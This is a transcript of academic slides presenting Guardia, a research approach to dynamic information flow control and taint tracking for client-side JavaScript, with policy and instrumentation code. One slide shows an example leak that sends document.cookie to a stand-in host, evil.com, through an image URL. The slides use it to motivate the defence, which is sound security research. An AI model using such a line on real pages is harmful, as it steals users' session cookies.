Practical Information Flow Control for Client-Side Web Applications

Transcript

1. Practical Information Flow Control for Client-Side Web Applications Angel Luis

   Scull Pupo, Jens Nicolay, Elisa Gonzalez Boix {ascullpu, jens.nicolay, egonzale}@vub.be 1

2. Web applications today Browser 0 0 0 Search Advertising Social

   Networking Markup Frameworks Template Engines Password Strength Checkers Application server 2

3. Browser security mechanisms Same-Origin-Policy It is a security mechanism for

   isolating potentially malicious resources. 3 Browser 0 0 0 Search • Content from different origins have limited interaction. • Not suitable for context-sensitive components. • Not suitable for tight integration of third party services.

4. JavaScript inclusion is all or nothing <html> <head> <script src=“http://passtrengh.com/plugin.js”></script>

   <script src="http://ads.com"></script> <script src=“/app/main.js“></script> … </head> <body> … Password Strength Checker example We need to share sensitive information but prevent its leaking 4

5. IFC to the Rescue

6. Information Flow Policies Goal: Confidentiality Secret data cannot flow to

   public sinks. let leak = document.cookie; … … … let img = document.createElement(‘img’); … … img.setSrc(“http://evil.com?q=”+leak); 6 • Soundness • Transparency • Permissiveness (precision) Evaluation Metrics

7. Types of Information Flow Implicit Explicit let password = document.getElementById(“pass”).value;

   let dummy = password.substring(4); console.log(dummy); let secret = 12 let public = 5 if(secret){ public = 4; } console.log(public); The attacker can learn one bit of the secret 7

8. Approaches for IFC in JavaScript Static Analysis • No runtime

   overhead. • Can explore all paths of the execution. • Has access to approximate values of the execution. • JavaScript dynamic code evaluation is a challenge. • Aliasing of objects is a challenge. 8

9. Approaches for IFC in JavaScript Dynamic Analysis • Has access

   to exact runtime values. • Can handle dynamic code evaluation. • Aliasing does not represent a problem. • Has an impact on performance of the system. • Has access to one path of the execution. 9

10. Dynamic IFC Approaches Title Approach Granularity Language Implementation LeGuernic 2007

    Automata Fine Sequential - SME 2010* Parallel Executions Fine Any (JavaScript) Interpreter IFC for Core JS 2012 Dyn. Type System Fine JavaScript Op. Semantics JSFlow 2014 Dynamic Fine JavaScript Interpreter COWL 2014 Dynamic Coarse JavaScript Interpreter Value-sensitive Hybrid IFC 15’ Dynamic + Static Fine JavaScript Op. Semantics Inlined IFC Monitor 15’ 16’ Dynamic + Static Fine JavaScript Instrumented

11. Dynamic IFC without VM modification

12. Characteristics of Guardia • Internal DSL. • Declarative. • Specification

    decoupled from enforcement. • No interpreter modification. G.installPolicy({ whenRead: [G.Not(G.And(G.Allow([‘createElement']), G.ParamAt(equals, G.getVType(0, String), 'iframe')))] }).on(document)

13. IFC in Guardia Goals • Purely dynamic analysis IFC. •

    Support for explicit and implicit IFC. • Portable across different browsers.

14. Dynamic IFC in Guardia Explicit flows Associate a security label

    with each object Implicit flows Associate a security label with the PC(context) • No Sensitive Upgrade (NSU) • Permissive Upgrade (PU) let a = 6; let c = a/2; let a = 6; let b = true; if(b){ a = 9; } 14

15. Enforcement 15

16. Explicit IFC tracking Taint analysis technique is used to handle

    explicit IFC … var age = document.getElementById(“age").value; var res = age / group; … console.log(group); … console.log(res); … Taint Track Enforce We need means to track tainted data Adds a taint flag to program values 16

17. Handling implicit flows Permissive Upgrade Approach [1] T. H. Austin

    and C. Flanagan, “Permissive dynamic information flow analysis.,” PLAS, pp. 1–12, 2010. L ⊆ H ⊆ P PU introduces a partially leaked data label 17

18. Dynamic taint analysis using code instrumentation Linvail as instrumentation platform

    • Provides a transparent analysis layer. • Allows tagging runtime values regardless of their types. - 2, true, ‘Hello World’ - {name : “John”} • Provides life-long value tracking. get set apply Harmony proxy var y = Math.sqrt(x); var str = JSON.stringify(obj); composite data External World 18 Internal World

19. Taint analysis with Linvail var age = document.getElementById(“age").value; var res

    = age / 20; console.log(res); Linvail _meta_.__global__=_meta_.__global__||(function () { return this } ());_meta_.__eval__=_meta_.__eval__||eval;_meta_.__apply__=_meta_.__apply__|| (typeof Reflect === 'object' ? Reflect.apply : function(f,t,xs){return f.apply(t,xs)});_meta_.__defineProperty__=_meta_.__defineProperty__|| Object.defineProperty;_meta_.primitive(void 0,1);var taintedVal;(taintedVal=_meta_.apply(_meta_taint,null,[_meta_.primitive(42,5)],3));;var res; (res=_meta_.binary("*",taintedVal,_meta_.primitive(7,9),7));;_meta_.apply(_meta_.get((_meta_1=console),_meta_.primitive("log",11),11),_meta_1, [res],11); function enter(val, idx, ctx) { if (isprimitive(val)) { val = { inner: val }; wrappers.add(val); pointers.set(val, ++counter); return val; } return val; } function leave(val, idx, ctx) { return wrappers.has(val) ? val.inner : val; } var linvail = Linvail(enter, leave); global._meta_ = {}; }) IFC ANALYSIS + INSTRUMENTED 19

20. Taint analysis with Linvail Linvail is used as a library

    and allows to intercept language operations let global = { binary: function (o, l, r, i) { let res = linvail["binary"](o, l, r, i); res.taint = l.taint || r.taint; return res; }, set: function (o, k, v, i) { let res = linvail["set"](o, k, v, i); res.taint = v.taint; return res; }, apply: function (fn, ths, args, i) { if (isSink(fn) && isTainted(args))) { throw new Error('IFC violation!’); }else{ return linvail[“apply”](fn, ths, args, i); } } } Base program operations Meta program analysis 20

21. Challenges • Handle the DOM API - We cannot instrument

    the DOM. - Function annotation is not possible cause DOM is stateful. • Dynamic Objects - Structure and existence of properties. • Exceptions - Exceptions can be used to change the flow of the execution and learn a bit of information. • Higher-order functions - Functions can leak information if they are created in sensitive contexts. • Prototype chain - The prototype chain of object can be used to encode and leak information. 21

22. Evaluation • We are performing evaluation using language challenges presented

    before. • Evaluation of performance, transparency and permissiveness is ongoing work. 22

23. Conclusions • It is possible to enforce IFC policies without

    runtime modifications. • Remains unclear how to protect the instrumented program from attacks. 23